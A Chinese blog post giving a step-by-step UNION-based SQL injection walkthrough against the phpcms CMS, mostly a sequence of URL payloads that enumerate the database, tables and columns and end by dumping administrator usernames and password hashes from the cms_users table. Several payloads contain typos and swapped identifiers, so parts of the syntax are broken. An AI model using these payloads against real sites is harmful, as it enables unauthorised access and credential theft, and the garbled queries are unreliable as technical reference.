phpcms框架SQL注入--基于Havij工具

sql注入的步骤:


1.首先观察网站是通过GET还是POST方式传输数据的:


                   a.如果是GET传输,则在url中输入?id=1' 或者 " 或者 ') 来测试是否存在sql注入。

                   b.如果是POST传输,则在输入框中输入?id=1' 或者 " 或者 ') 来测试是否存在sql注入。

2.测试完成发现存在注入,进行注入,先测试有多少表单:

                    a.?id=1 order by *(*数字为数字)进行测试,

3.测试完表单,进行表单查询:

                    a.?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --+

                         (得到回显的表单)

4.测完回显的数据,就可以进行查询了:

                    a.查询当前数据库:?id=1 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15 --+

                     b.查询用户名:?id=1 and 1=2 union select 1,2,user() ,4,5,6,7,8,9,10,11,12,13,14,15 --+

                     c.查询数据库版本:?id=1 and 1=2 union select 1,2,version() ,4,5,6,7,8,9,10,11,12,13,14,15 --+

                     d.查询全文件位置:?id=1 and 1=2 union select 1,2,@@datadir,4,5,6,7,8,9,10,11,12,13,14,15 --+

5.得到以上数据,进行全局查询:

                    a.查询数据库:?id=1 and 1=2 union select 1,2,group_concat(convert(tabal_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15  from information_schema.SCHEMATA

                     b.查询数据库表:?id=1 and 1=2 union select 1,2,group_concat(convert(SCHEMA_HAME using

latin1)),4,5,6,7,8,9,10,11,12,13,14,15  from information_schema.tabales where table _schema=database()    (查询database()中的表)

                      c.查询数据表中的列:?id=1 and 1=2 union select 1,2,group_concat(convert(column_name using

latin1)),4,5,6,7,8,9,10,11,12,13,14,15  from information_schema.columns where table _name=0x636D735F75736557273(CMS USER)  # 表名需要编码为16进制

                       d.查询管理员账号和密码:?id= 1 and 1=2 union select 1,2,concat_ws(0x2b,userid,username,password),4,5,6,7,8,9,10,11,12,13,14,15  from cms.cms_users

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • 赏花,聆听花语;听雨,风雨呢喃;看山,山水含笑,观云,云自飘逸。 走过漫长的冬季,春终于翩翩而来,瞧!...
    安小作阅读 3,443评论 1 5
  • 就在昨天,我爆发了人生中最严重的一次抑郁。客观来说,其实我不知道这是不是抑郁,我从来没有找过相关的书籍阅读过,也从...
    苑栩阅读 3,294评论 0 0
  • Java编程的精髓是面向接口编程,Java8最大变化正在于接口。 默认方法(default method) 函数式...
    packet阅读 4,090评论 0 1
  • 大观园 楚地三月新柳青, 丹水入夜群蛙鸣。 坐看湖中烟波起, 卧听细浪戏春风。 秦兴楚亡罢刀兵, 范公故里神无踪。...
    farmerlzy阅读 1,184评论 0 0
  • 1.感恩表姐跟我一起做瑜伽,感恩瑜伽让我心情愉悦平静,快乐满足,不仅仅舒展我的身体,也舒展了我的心灵,让我更加包容...
    柔光宝宝阅读 1,234评论 0 0

友情链接更多精彩内容